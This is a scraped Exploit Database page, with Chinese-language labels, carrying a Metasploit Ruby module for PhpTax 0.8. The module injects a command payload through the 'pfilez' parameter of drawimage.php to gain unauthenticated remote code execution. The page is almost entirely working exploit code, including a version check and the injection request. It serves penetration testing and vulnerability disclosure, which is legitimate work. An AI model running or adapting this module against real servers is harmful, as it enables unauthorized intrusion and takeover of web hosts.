PhpTax – ‘pfilez’ Execution Remote Code Injection (Metasploit)

• Exploit Database
• 105 阅读

• 作者： Metasploit
  日期： 2012-10-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/21833/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info={}) super(update_info(info, &apos;Name&apos; => "PhpTax pfilez Parameter Exec Remote Code Injection", &apos;Description&apos;=> %q{ This module exploits a vulnerability found in PhpTax, an income tax report generator.When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in a exec() statement, and then results in arbitrary remote code execution under the context of the web server.Please note: authentication is not required to exploit this vulnerability. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Jean Pascal Pereira <pereira[at]secbiz.de>&apos;, &apos;sinn3r&apos;#Metasploit ], &apos;References&apos; => [ [&apos;EDB&apos;, &apos;21665&apos;] ], &apos;Payload&apos;=> { &apos;Compat&apos; => { &apos;ConnectionType&apos; => &apos;find&apos;, &apos;PayloadType&apos;=> &apos;cmd&apos;, &apos;RequiredCmd&apos;=> &apos;generic perl ruby bash telnet python&apos; } }, &apos;Platform&apos; => [&apos;unix&apos;, &apos;linux&apos;], &apos;Targets&apos;=> [ [&apos;PhpTax 0.8&apos;, {}] ], &apos;Arch&apos; => ARCH_CMD, &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => "Oct 8 2012", &apos;DefaultTarget&apos;=> 0))   register_options( [ OptString.new(&apos;TARGETURI&apos;, [true, &apos;The path to the web application&apos;, &apos;/phptax/&apos;]) ], self.class) end     def check target_uri.path << &apos;/&apos; if target_uri.path[-1,1] != &apos;/&apos; res = send_request_raw({&apos;uri&apos;=>target_uri.path}) if res and res.body =~ /PHPTAX by William L\. Berggren/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown end end     def exploit target_uri.path << &apos;/&apos; if target_uri.path[-1,1] != &apos;/&apos;   print_status("#{rhost}#{rport} - Sending request...") res = send_request_cgi({ &apos;method&apos; => &apos;GET&apos;, &apos;uri&apos;=> "#{target_uri.path}drawimage.php", &apos;vars_get&apos; => { &apos;pdf&apos;=> &apos;make&apos;, &apos;pfilez&apos; => "xxx; #{payload.encoded}" } })   handler end end